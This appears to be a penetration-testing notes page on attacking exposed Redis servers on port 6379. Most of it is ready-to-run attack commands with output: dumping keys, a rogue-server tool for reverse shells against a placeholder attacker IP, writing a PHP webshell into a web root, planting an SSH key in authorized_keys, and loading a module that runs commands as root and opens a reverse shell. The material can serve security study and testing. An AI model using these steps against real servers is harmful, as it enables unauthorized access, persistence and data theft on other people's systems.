Port 6379 (REDIS)

Dumping Database

Inside Redis the databases are numbers starting from 0. You can find if anyone is used in the output of the command info inside the "Keyspace" chunk:

Or you can just get all the keyspaces (databases) with:

INFO keyspace

In that example the database 0 and 1 are being used. Database 0 contains 4 keys and database 1 contains 1. By default Redis will use database 0. In order to dump for example database 1 you need to do:

SELECT 1 [ ... Indicate the database ... ] 
KEYS * [ ... Get Keys ... ] 
GET <KEY> [ ... Get Key ... ]

In case you get the following error -WRONGTYPE Operation against a key holding the wrong kind of value while running GET <KEY> it's because the key may be something else than a string or an integer and requires a special operator to display it.

To know the type of the key, use the TYPE command, example below for list and hash keys.

TYPE <KEY> [ ... Type of the Key ... ] 
LRANGE <KEY> 0 -1 [ ... Get list items ... ] 
HGET <KEY> <FIELD> [ ... Get hash item ... ]  # If the type used is weird you can always do: DUMP <key>`

Dump the database with npm redis-dump or python redis-utils

Redis RCE

Interactive Shell

redis-rogue-server can automatically get an interactive shell or a reverse shell in Redis(<=5.0.5).

./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ACCACKER_IP>

PHP Webshell

After you did the command info, you must know the path of the Web site folder:

root@kali:~# redis-cli -h 10.85.0.52 
10.85.0.52:6379> config set dir /usr/share/nginx/html 
OK 
10.85.0.52:6379> config set dbfilename redis.php 
OK 
10.85.0.52:6379> set test "<?php phpinfo(); ?>" 
OK  
10.85.0.52:6379> save 
OK

SSH

Generate a ssh public-private key pair on your pc:

ssh-keygen -t rsa

Write the public key to a file:

(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt

Import the file into redis:

**`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key

Save the public key to the authorized_keys file on redis server:

root@kali:~# redis-cli -h 10.85.0.52 
10.85.0.52:6379> config set dir /var/lib/redis/.ssh 
OK 
10.85.0.52:6379> config set dbfilename "authorized_keys" 
OK 
10.85.0.52:6379> save 
OK

**Finally, you can ssh to the redis server with private key:

ssh -i id_rsa redis@10.85.0.52

This technique is automated here: https://github.com/Avinash-acid/Redis-Server-Exploit

Load Redis Module

Following the instructions from https://github.com/n0b0dyCN/RedisModules-ExecuteCommand you can compile a redis module to execute arbitrary commands.

Then you need some way to upload the compiled module (for example ftp)

Load the uploaded module at runtime

MODULE LOAD /path/to/mymodule.so

List loaded modules to check it was correctly loaded:

MODULE LIST

Execute commands:

127.0.0.1:6379> system.exec "id" 
"uid=0(root) gid=0(root) groups=0(root)" 
127.0.0.1:6379> system.exec "whoami" 
"root" 
127.0.0.1:6379> system.rev 127.0.0.1 9999

Unload the module whenever you want:

MODULE UNLOAD mymodule

PreviousPort 3389 (RDP)NextPassword Attacks

Last updated 8 days ago